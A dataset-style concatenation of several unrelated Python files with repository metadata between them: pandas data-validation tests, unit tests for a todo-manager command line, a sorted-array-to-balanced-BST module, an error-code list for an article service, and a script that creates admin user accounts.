assert validation_helper.clean_col('\nclean me! ') == "clean me!"
assert validation_helper.clean_col(0) == '0'
assert validation_helper.clean_col(1) == '1'
assert validation_helper.clean_col(' \" double quotes\"') == 'double quotes'
assert validation_helper.clean_col([]) == '[]'
assert validation_helper.clean_col({}) == '{}'
def test_clean_frame_vectorized():
df_under_test = pd.DataFrame([
['""', "", " lspace", '"lquote'],
["''", " ", "rspace ", 'rquote"'],
["'hello'", " ", " surround space ", '"surround quote"'],
['"hello"', "\n\t", None, '" surround quote and space "'],
['"hello you"', "5", np.NaN, ' " surround quote and space "\t'],
], columns=list("ABCD"))
df_under_test = validation_helper.clean_frame_vectorized(df_under_test)
expected_df = pd.DataFrame([
[None, None, "lspace", '"lquote'],
["''", None, "rspace", 'rquote"'],
["'hello'", None, "surround space", "surround quote"],
["hello", None, None, "surround quote and space"],
["hello you", "5", None, "surround quote and space"],
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_clean_frame_vectorized_mixed_types():
df_under_test = pd.DataFrame([
['""', "", np.NaN, '"25'],
["''", " ", "NaN", '-10"'],
["'10'", " ", np.int64(12), '"0"'],
[77, "\n\t", None, 0.0],
['"11 8"', "5", np.float64(8.2), '99\t'],
], columns=list("ABCD"))
df_under_test = validation_helper.clean_frame_vectorized(df_under_test, convert_to_str=True)
expected_df = pd.DataFrame([
[None, None, None, '"25'],
["''", None, "NaN", '-10"'],
["'10'", None, "12", "0"],
["77", None, None, "0.0"],
["11 8", "5", "8.2", "99"],
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_clean_numbers():
# Normal cases
assert validation_helper.clean_numbers('10') == '10'
assert validation_helper.clean_numbers('1,00') == '100'
assert validation_helper.clean_numbers('-10,000') == '-10000'
assert validation_helper.clean_numbers('0') == '0'
# This is originall designed for just strings but we should still account for these
assert validation_helper.clean_numbers(10) == '10'
assert validation_helper.clean_numbers(-10) == '-10'
assert validation_helper.clean_numbers(0) == '0'
assert validation_helper.clean_numbers(0) == '0'
assert validation_helper.clean_numbers(None) is None
assert validation_helper.clean_numbers(['A']) == ['A']
def test_clean_numbers_vectorized_all_strings():
df_under_test = pd.DataFrame([
["10,003,234", "bad,and", "2242424242", "-10"],
["0", "8", "9.424.2", "-10,000"],
["9.24242", ",2,094", ",01", ",-0,0"],
["1,45", "0055", None, np.NaN]
], columns=list("ABCD"))
for col in df_under_test.columns:
validation_helper.clean_numbers_vectorized(df_under_test[col])
expected_df = pd.DataFrame([
["10003234", "bad,and", "2242424242", "-10"],
["0", "8", "9.424.2", "-10000"],
["9.24242", "2094", "01", "-00"],
["145", "0055", None, np.NaN]
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_clean_numbers_vectorized_mixed_types():
df_under_test = pd.DataFrame([
["10,003,234", "bad,and", 2242424242, -10],
[0, 8, "9.424.2", -4.35],
[9.24242, ",2,094", ",01", -0],
["1,45", "0055", None, np.NaN]
], columns=list("ABCD"))
for col in df_under_test.columns:
validation_helper.clean_numbers_vectorized(df_under_test[col], convert_to_str=True)
expected_df = pd.DataFrame([
["10003234", "bad,and", 2242424242, -10],
[0, 8, "9.424.2", -4.35],
[9.24242, "2094", "01", -0],
["145", "0055", None, np.NaN]
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_concat_flex():
# Tests a blank value, column sorting, ignoring row number, and the basic functionality
flex_row = {'row_number': '4', 'col 3': None, 'col 2': 'B', 'col 1': 'A'}
assert validation_helper.concat_flex(flex_row) == 'col 1: A, col 2: B, col 3: '
flex_row = {'just one': 'column'}
assert validation_helper.concat_flex(flex_row) == 'just one: column'
def test_derive_unique_id():
row = {'display_tas': 'DISPLAY-TAS', 'afa_generated_unique': 'AFA-GENERATED-UNIQUE', 'something': 'else'}
assert validation_helper.derive_unique_id(row, is_fabs=True) == 'AssistanceTransactionUniqueKey:' \
' AFA-GENERATED-UNIQUE'
assert validation_helper.derive_unique_id(row, is_fabs=False) == 'TAS: DISPLAY-TAS'
def test_derive_fabs_awarding_sub_tier():
row = {'awarding_sub_tier_agency_c': '9876', 'awarding_office_code': '4567'}
derive_row = {'awarding_sub_tier_agency_c': None, 'awarding_office_code': '4567'}
office_list = {'4567': '0123'}
# Normal
assert validation_helper.derive_fabs_awarding_sub_tier(row, office_list) == '9876'
# Derivation
assert validation_helper.derive_fabs_awarding_sub_tier(derive_row, office_list) == '0123'
# Failed Derivation
assert validation_helper.derive_fabs_awarding_sub_tier(derive_row, {}) is None
def test_derive_fabs_afa_generated_unique():
# All populated
row = {'awarding_sub_tier_agency_c': '0123',
'fain': 'FAIN',
'uri': 'URI',
'cfda_number': '4567',
'award_modification_amendme': '0'}
assert validation_helper.derive_fabs_afa_generated_unique(row) == '0123_FAIN_URI_4567_0'
# Some missing
row = {'awarding_sub_tier_agency_c': '0123',
'fain': None,
'uri': 'URI',
'cfda_number': '4567',
'award_modification_amendme': None}
assert validation_helper.derive_fabs_afa_generated_unique(row) == '0123_-none-_URI_4567_-none-'
# All missing
row = {'awarding_sub_tier_agency_c': None,
'fain': None,
'uri': None,
'cfda_number': None,
'award_modification_amendme': None}
assert validation_helper.derive_fabs_afa_generated_unique(row) == '-none-_-none-_-none-_-none-_-none-'
def test_derive_fabs_unique_award_key():
# Record type 1 - choose URI
row = {'awarding_sub_tier_agency_c': '0123',
'fain': 'FAIN',
'uri': 'URI',
'record_type': '1'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_AGG_URI_0123'
row = {'awarding_sub_tier_agency_c': None,
'fain': 'FAIN',
'uri': None,
'record_type': '1'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_AGG_-NONE-_-NONE-'
# Record type 2 - choose FAIN
row = {'awarding_sub_tier_agency_c': '4567',
'fain': 'FAIN',
'uri': 'URI',
'record_type': '2'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_NON_FAIN_4567'
row = {'awarding_sub_tier_agency_c': None,
'fain': None,
'uri': 'URI',
'record_type': '2'}
assert validation_helper.derive_fabs_unique_award_key(row) == 'ASST_NON_-NONE-_-NONE-'
def test_apply_label():
# Normal case
labels = {'field_name': 'field_label'}
row = {'Field Name': 'field_name'}
assert validation_helper.apply_label(row, labels, is_fabs=True) == 'field_label'
# Field name not in labels
row = {'Field Name': 'other_field_name'}
assert validation_helper.apply_label(row, labels, is_fabs=True) == ''
# Not FABS
row = {'Field Name': 'field_name'}
assert validation_helper.apply_label(row, labels, is_fabs=False) == ''
def test_gather_flex_fields():
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
row = {'Row Number': '4'}
assert validation_helper.gather_flex_fields(row, flex_data) == 'D'
assert validation_helper.gather_flex_fields(row, None) == ''
def test_valid_type():
str_field = FileColumn(field_types_id=FIELD_TYPE_DICT['STRING'])
int_field = FileColumn(field_types_id=FIELD_TYPE_DICT['INT'])
csv_schema = {'str_field': str_field, 'int_field': int_field}
# For more detailed tests, see is_valid_type
row = {'Field Name': 'int_field', 'Value Provided': 'this is a string'}
assert validation_helper.valid_type(row, csv_schema) is False
row = {'Field Name': 'int_field', 'Value Provided': '1000'}
assert validation_helper.valid_type(row, csv_schema) is True
def test_expected_type():
bool_field = FileColumn(field_types_id=FIELD_TYPE_DICT['BOOLEAN'])
dec_field = FileColumn(field_types_id=FIELD_TYPE_DICT['DECIMAL'])
csv_schema = {'bool_field': bool_field, 'dec_field': dec_field}
row = {'Field Name': 'bool_field'}
assert validation_helper.expected_type(row, csv_schema) == 'This field must be a boolean'
row = {'Field Name': 'dec_field'}
assert validation_helper.expected_type(row, csv_schema) == 'This field must be a decimal'
def test_valid_length():
length_field = FileColumn(length=5)
non_length_field = FileColumn()
csv_schema = {'length_field': length_field, 'non_length_field': non_length_field}
row = {'Field Name': 'length_field', 'Value Provided': 'this is more than five characters'}
assert validation_helper.valid_length(row, csv_schema) is False
row = {'Field Name': 'length_field', 'Value Provided': 'four'}
assert validation_helper.valid_length(row, csv_schema) is True
row = {'Field Name': 'non_length_field', 'Value Provided': 'can be any length'}
assert validation_helper.valid_length(row, csv_schema) is True
def test_expected_length():
length_field = FileColumn(length=5)
non_length_field = FileColumn()
csv_schema = {'length_field': length_field, 'non_length_field': non_length_field}
row = {'Field Name': 'length_field'}
assert validation_helper.expected_length(row, csv_schema) == 'Max length: 5'
row = {'Field Name': 'non_length_field'}
assert validation_helper.expected_length(row, csv_schema) == 'Max length: None'
def test_update_field_name():
short_cols = {'short_field_name': 'sfn'}
row = {'Field Name': 'short_field_name'}
assert validation_helper.update_field_name(row, short_cols) == 'sfn'
row = {'Field Name': 'long_field_name'}
assert validation_helper.update_field_name(row, short_cols) == 'long_field_name'
def test_add_field_name_to_value():
row = {'Field Name': 'field_name', 'Value Provided': 'value_provided'}
assert validation_helper.add_field_name_to_value(row) == 'field_name: value_provided'
def test_check_required():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'required1': ['Yes', 'Yes', None, 'Yes', None],
'required2': ['Yes', None, 'Yes', None, None],
'not_required1': [None, None, 'Yes', None, None],
'not_required2': ['Yes', 'Yes', None, 'Yes', 'Yes']})
required = ['required1', 'required2']
required_labels = {'required1': 'Required 1'}
report_headers = ValidationManager.report_headers
short_cols = {'required1': 'req1', 'not_required1': 'n_req1', 'not_required2': 'n_req2'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
is_fabs = False
error_msg = ValidationError.requiredErrorMsg
expected_value = '(not blank)'
error_type = ValidationError.requiredError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID3', 'req1', error_msg, '', expected_value, '', 'C', '3', '', error_type],
['ID5', 'req1', error_msg, '', expected_value, '', 'E', '5', '', error_type],
['ID2', 'required2', error_msg, '', expected_value, '', 'B', '2', '', error_type],
['ID4', 'required2', error_msg, '', expected_value, '', 'D', '4', '', error_type],
['ID5', 'required2', error_msg, '', expected_value, '', 'E', '5', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_required(data, required, required_labels, report_headers, short_cols, flex_data,
is_fabs)
assert_frame_equal(error_df, expected_error_df)
is_fabs = True
expected_data = [
['ID3', 'req1', error_msg, '', expected_value, '', 'C', '3', 'Required 1', error_type],
['ID5', 'req1', error_msg, '', expected_value, '', 'E', '5', 'Required 1', error_type],
['ID2', 'required2', error_msg, '', expected_value, '', 'B', '2', '', error_type],
['ID4', 'required2', error_msg, '', expected_value, '', 'D', '4', '', error_type],
['ID5', 'required2', error_msg, '', expected_value, '', 'E', '5', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_required(data, required, required_labels, report_headers, short_cols, flex_data,
is_fabs)
assert_frame_equal(error_df, expected_error_df)
def test_check_type():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'int': ['1', '2', '3', 'no', '5'],
'dec': ['1.3', '1', 'no', '1232', '4.3'],
'bool': ['no', 'Yes', 'TRUE', 'false', '4'],
'string': ['this', 'row', 'should', 'be', 'ignored']})
type_fields = ['int', 'bool', 'dec']
type_labels = {'int': 'Integer', 'dec': 'Decimal'}
report_headers = ValidationManager.report_headers
csv_schema = {'int': FileColumn(field_types_id=FIELD_TYPE_DICT['INT']),
'bool': FileColumn(field_types_id=FIELD_TYPE_DICT['BOOLEAN']),
'dec': FileColumn(field_types_id=FIELD_TYPE_DICT['DECIMAL'])}
short_cols = {'int': 'i', 'bool': 'b'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
is_fabs = False
error_msg = ValidationError.typeErrorMsg
error_type = ValidationError.typeError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID4', 'i', error_msg, 'i: no', 'This field must be a int', '', 'D', '4', '', error_type],
['ID5', 'b', error_msg, 'b: 4', 'This field must be a boolean', '', 'E', '5', '', error_type],
['ID3', 'dec', error_msg, 'dec: no', 'This field must be a decimal', '', 'C', '3', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_type(data, type_fields, type_labels, report_headers, csv_schema, short_cols,
flex_data, is_fabs)
assert_frame_equal(error_df, expected_error_df)
is_fabs = True
expected_data = [
['ID4', 'i', error_msg, 'i: no', 'This field must be a int', '', 'D', '4', 'Integer', error_type],
['ID5', 'b', error_msg, 'b: 4', 'This field must be a boolean', '', 'E', '5', '', error_type],
['ID3', 'dec', error_msg, 'dec: no', 'This field must be a decimal', '', 'C', '3', 'Decimal', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_type(data, type_fields, type_labels, report_headers, csv_schema, short_cols,
flex_data, is_fabs)
assert_frame_equal(error_df, expected_error_df)
def test_check_length():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'has_length': ['1', '12', '123', '1234', '12345'],
'no_length': ['', '1', 'no', '1232', '4.3']})
length_fields = ['has_length']
report_headers = ValidationManager.report_headers
csv_schema = {'has_length': FileColumn(length=3),
'no_length': FileColumn()}
short_cols = {'has_length': 'len'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
type_error_rows = ['5']
error_msg = ValidationError.lengthErrorMsg
error_type = ValidationError.lengthError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID4', 'len', error_msg, 'len: 1234', 'Max length: 3', '', 'D', '4', '', error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_length(data, length_fields, report_headers, csv_schema, short_cols, flex_data,
type_error_rows)
assert_frame_equal(error_df, expected_error_df)
def test_check_field_format():
data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'unique_id': ['ID1', 'ID2', 'ID3', 'ID4', 'ID5'],
'dates': [None, '20200101', '200012', 'abcdefgh', '20201301']})
format_fields = ['dates']
report_headers = ValidationManager.report_headers
short_cols = {'dates': 'date'}
flex_data = pd.DataFrame({'row_number': ['1', '2', '3', '4', '5'],
'concatted': ['A', 'B', 'C', 'D', 'E']})
error_msg = ValidationError.fieldFormatErrorMsg
error_type = ValidationError.fieldFormatError
# report_headers = ['Unique ID', 'Field Name', 'Rule Message', 'Value Provided', 'Expected Value', 'Difference',
# 'Flex Field', 'Row Number', 'Rule Label'] + ['error_type']
expected_data = [
['ID3', 'date', error_msg, 'date: 200012', 'A date in the YYYYMMDD format.', '', 'C', '3', 'DABSDATETIME',
error_type],
['ID4', 'date', error_msg, 'date: abcdefgh', 'A date in the YYYYMMDD format.', '', 'D', '4', 'DABSDATETIME',
error_type],
['ID5', 'date', error_msg, 'date: 20201301', 'A date in the YYYYMMDD format.', '', 'E', '5', 'DABSDATETIME',
error_type]
]
expected_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
error_df = validation_helper.check_field_format(data, format_fields, report_headers, short_cols, flex_data)
assert_frame_equal(error_df, expected_error_df)
def test_parse_fields(database):
sess = database.session
fields = [
FileColumn(name_short='string', field_types_id=FIELD_TYPE_DICT['STRING'], length=5),
FileColumn(name_short='bool', field_types_id=FIELD_TYPE_DICT['BOOLEAN'], required=True),
FileColumn(name_short='dec', field_types_id=FIELD_TYPE_DICT['DECIMAL']),
FileColumn(name_short='int', field_types_id=FIELD_TYPE_DICT['INT'], padded_flag=True, length=4, required=True),
FileColumn(name_short='date', field_types_id=FIELD_TYPE_DICT['DATE'])
]
sess.add_all(fields)
expected_parsed_fields = {
'required': ['bool', 'int'],
'number': ['dec', 'int'],
'boolean': ['bool'],
'format': ['date'],
'length': ['string', 'int'],
'padded': ['int']
}
expected_expected_headers = ['bool', 'int', 'dec', 'string', 'date']
expected_headers, parsed_fields = validation_helper.parse_fields(sess, fields)
assert parsed_fields == expected_parsed_fields
assert set(expected_headers) == set(expected_expected_headers)
def test_process_formatting_errors():
short_rows = ['1', '4', '5']
long_rows = ['2', '6']
error_msg = ValidationError.readErrorMsg
error_type = ValidationError.readError
error_name = 'Formatting Error'
report_headers = ValidationManager.report_headers
expected_data = [
['', error_name, error_msg, '', '', '', '', '1', '', error_type],
['', error_name, error_msg, '', '', '', '', '2', '', error_type],
['', error_name, error_msg, '', '', '', '', '4', '', error_type],
['', error_name, error_msg, '', '', '', '', '5', '', error_type],
['', error_name, error_msg, '', '', '', '', '6', '', error_type]
]
expected_format_error_df = pd.DataFrame(expected_data, columns=report_headers + ['error_type'])
assert_frame_equal(validation_helper.process_formatting_errors(short_rows, long_rows, report_headers),
expected_format_error_df)
def test_simple_file_scan():
# Note: only testing locally
assert validation_helper.simple_file_scan(CsvReader(), None, None, READ_ERROR) == (11, [5], [2, 3, 7], [], [])
assert validation_helper.simple_file_scan(CsvReader(), None, None, BLANK_C) == (5, [], [], [3], [4])
|
cc0-1.0
| -1,782,877,558,913,749,800 | 45.863462 | 119 | 0.588904 | false |
niavok/todomanager
|
tests/todomanagercli/todomanagerclitest.py
|
1
|
8873
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Romain Roffé
#
# This file is part of Todomanager
#
# Todomanager is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Todomanager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Todomanager; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import unittest
from libtodomanager.todomanager import *
from todomanagercli.commands import *
from todomanagercli.shell import *
class TestPrintTagList(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandPrintTagList()
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 0
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
class TestAddTag(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandAddTag()
def runTest(self):
cmdParam = HandlerParam()
setattr(cmdParam, "name", "Tag1")
cmdParamCount = 1
self.assertEqual(self.todo.getTagCount(), 0)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getTagCount(), 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
self.assertEqual(self.todo.getTagCount(), 1)
cmdParam = HandlerParam()
setattr(cmdParam, "name", "Tag2")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getTagCount(), 2)
res = self.todo.getTagByName("Tag1")
self.assertNotEqual(res, None)
res = self.todo.getTagByName("Tag2")
self.assertNotEqual(res, None)
class TestPrintOpenedTicketList(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandPrintOpenedTicketList()
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 0
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
class TestOpenTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandOpenTicket()
def runTest(self):
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
self.assertEqual(self.todo.getOpenedTicketsCount(), 0)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getOpenedTicketsCount(), 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getOpenedTicketsCount(), 2)
ticketList = self.todo.getOpenedTickets()
self.assertEqual(ticketList.getTicketByIndex(0).getDescription(), "Ticket 1")
self.assertEqual(ticketList.getTicketByIndex(1).getDescription(), "Ticket 1")
class TestPrintTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandPrintTicket()
cmdOpenTicket = CommandOpenTicket()
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
res = cmdOpenTicket.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 1
setattr(cmdParam, "ticketId", 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
setattr(cmdParam, "ticketId", 2)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
class TestCloseTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandCloseTicket()
cmdOpenTicket = CommandOpenTicket()
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
res = cmdOpenTicket.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 1
setattr(cmdParam, "ticketId", 1)
self.assertEqual(self.todo.getOpenedTicketsCount(), 1)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getOpenedTicketsCount(), 0)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
setattr(cmdParam, "ticketId", 2)
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
class TestAddTagToTicket(unittest.TestCase):
def setUp(self):
self.todo = TodoManager()
self.cmd = CommandAddTagToTicket()
addTagCmd = CommandAddTag()
cmdParam = HandlerParam()
cmdParamCount = 1
setattr(cmdParam, "name", "Tag1")
res = addTagCmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
setattr(cmdParam, "name", "Tag2")
res = addTagCmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
self.assertEqual(self.todo.getTagCount(), 2)
self.tag1 = self.todo.getTagByName("Tag1")
self.assertNotEqual(self.tag1, None)
self.tag2 = self.todo.getTagByName("Tag2")
self.assertNotEqual(self.tag2, None)
cmdOpenTicket = CommandOpenTicket()
cmdParam = HandlerParam()
setattr(cmdParam, "description", "Ticket 1")
cmdParamCount = 1
res = cmdOpenTicket.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
def runTest(self):
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 1)
setattr(cmdParam, "tagName", "Tag1")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertFalse(ticket.hasTag(self.tag2))
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertFalse(ticket.hasTag(self.tag2))
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 1)
setattr(cmdParam, "tagName", "Tag2")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kOk)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertTrue(ticket.hasTag(self.tag2))
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 1)
setattr(cmdParam, "tagName", "Tag3")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertTrue(ticket.hasTag(self.tag2))
cmdParam = HandlerParam()
cmdParamCount = 2
setattr(cmdParam, "ticketId", 2)
setattr(cmdParam, "tagName", "Tag1")
res = self.cmd.runCommand(self.todo, cmdParamCount, cmdParam)
self.assertEqual(res, CommandError.kError)
ticket = self.todo.getTicketById(1)
self.assertNotEqual(ticket, None)
self.assertTrue(ticket.hasTag(self.tag1))
self.assertTrue(ticket.hasTag(self.tag2))
if __name__ == '__main__':
unittest.main()
|
gpl-2.0
| 7,759,414,658,352,935,000 | 34.346614 | 85 | 0.66445 | false |
hs634/algorithms
|
python/trees/sorted_arr_balanced_btree.py
|
1
|
1563
|
__author__ = 'hs634'
'''Given an array where elements are sorted in ascending order, convert it to a height balanced BST.'''
'''Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST.'''
def sorted_arr_to_balanced_btree(arr, start, end):
if start > end:
return None
mid = start + (end-start) / 2
root = BinaryTree().add_node(arr[mid])
root.left = sorted_arr_to_balanced_btree(arr, start, mid-1)
root.right = sorted_arr_to_balanced_btree(arr, mid+1, end)
return root
def sorted_linked_list_to_balanced_btree(list, start, end):
if start > end:
return None
mid = start + (end-start) / 2
left_child = sorted_linked_list_to_balanced_btree(list, start, mid-1)
parent = BinaryTree.add_node(list.data)
parent.left = left_child
list = list.next
parent.right = sorted_linked_list_to_balanced_btree(list, mid+1, end)
return parent
class LinkedList():
def __init__(self):
self.head = None
def add_node(self, data):
new_node = LinkedListNode(data)
if self.head is None:
self.head = new_node
else:
new_node.next = self.head
self.head = new_node
class LinkedListNode():
def __init__(self, data):
self.data = data
self.next = None
class BinaryTree(object):
def add_node(self, data):
return Node(data)
class Node(object):
def __init__(self, data):
self.data = data
self.left = None
self.right = None
|
mit
| -8,277,667,907,742,674,000 | 24.225806 | 115 | 0.619962 | false |
elifesciences/lax
|
src/publisher/codes.py
|
1
|
1533
|
"these constants help to classify errors that are raised during normal operation of Lax"
idx = {}
UNKNOWN = "unknown"
idx[
UNKNOWN
] = "an error occured that we haven't seen before to know how to best handle it"
INVALID = "invalid-article-json"
idx[
INVALID
] = "the article json failed validation against the spec. this happens at several points during INGEST and PUBLISH requests"
BAD_REQUEST = "bad-request"
idx[
BAD_REQUEST
] = "the request to lax couldn't be parsed or contained errors after being parsed"
PARSE_ERROR = "error-parsing-article-json"
idx[
PARSE_ERROR
] = """generic error we throw when we try to access something that isn't there or something that is there isn't correct, etc"""
ALREADY_PUBLISHED = "already-published"
idx[
ALREADY_PUBLISHED
] = "a PUBLISH or INGEST request was received for a specific version of an article already published. an INGEST request can happen many times before publication but can only happen after publication if the 'force' flag is present"
PREVIOUS_VERSION_UNPUBLISHED = "previous-version-unpublished"
idx[
PREVIOUS_VERSION_UNPUBLISHED
] = "attempt to ingest a version 2 when a version 1 not yet published"
PREVIOUS_VERSION_DNE = "previous-version-does-not-exist"
idx[
PREVIOUS_VERSION_DNE
] = "attempt to ingest a version 2 when a version 1 does not exist"
NO_RECORD = "record-not-found"
idx[
NO_RECORD
] = "thrown when we can't find something in the database that we expect to exist"
# ---
def explain(code):
return idx.get(code)
|
gpl-3.0
| 8,675,561,479,508,792,000 | 30.285714 | 230 | 0.742335 | false |
maia-dev/statFMB
|
statFMB/run.py
|
1
|
2049
|
import getpass
import re
from statFMB.views import app, socketio, create_tables, user_datastore, db
#NOTE: change the comments in order change hosts
def main():
socketio.run(app)
#socketio.run(app, host='0.0.0.0', port='80')
def create_db():
print('A inicializar tabelas!')
create_tables()
create_admin_user()
print('Base de dados criada')
def create_admin_user():
print('Criar conta de Administrador')
role = 'Administrador'
create_user(role)
print('Utilizador Criado!')
def create_user(role = None):
email = input(' email: ')
while not re.match(r'[^@]+@[^@]+\.[^@]+',email) or len(email) > 80:
print('Email invalido!')
email = input(' email: ')
password = getpass.getpass(' password: ')
while len(password) > 80:
print('Password demasiado longa! (max.80)')
password = getpass.getpass(' password: ')
name = input(' nome: ')
while len(name) > 100:
print('Nome demasiado longo! (max.100)')
name = input(' nome: ')
phone = input(' telefone: ')
while len(phone) != 9 or not phone.isdigit():
print('Numero de telefone invalido!')
phone = input(' telefone: ')
alias = input(' alias: ')
while len(alias) > 3 or len(alias) == 0:
print('Alias errado!')
alias = input(' alias: ')
if role == None:
role = input(' role (Administrador, Portageiro, Visualizador):')
while role not in ['Administrador', 'Portageiro', 'Visualizador']:
print('Role invalida!')
role = input(' role (Administrador, Portageiro, Visualizador):')
user_datastore.create_user(email = email,
password = password,
name = name,
phone = phone,
alias = alias,
)
user_datastore.add_role_to_user(email,role)
db.session.commit()
if __name__ == "__main__":
socketio.run(app)
#socketio.run(app, host='0.0.0.0', port='80')
|
gpl-3.0
| -1,613,877,727,886,731,000 | 29.58209 | 77 | 0.562714 | false |
urashima9616/Leetcode_Python
|
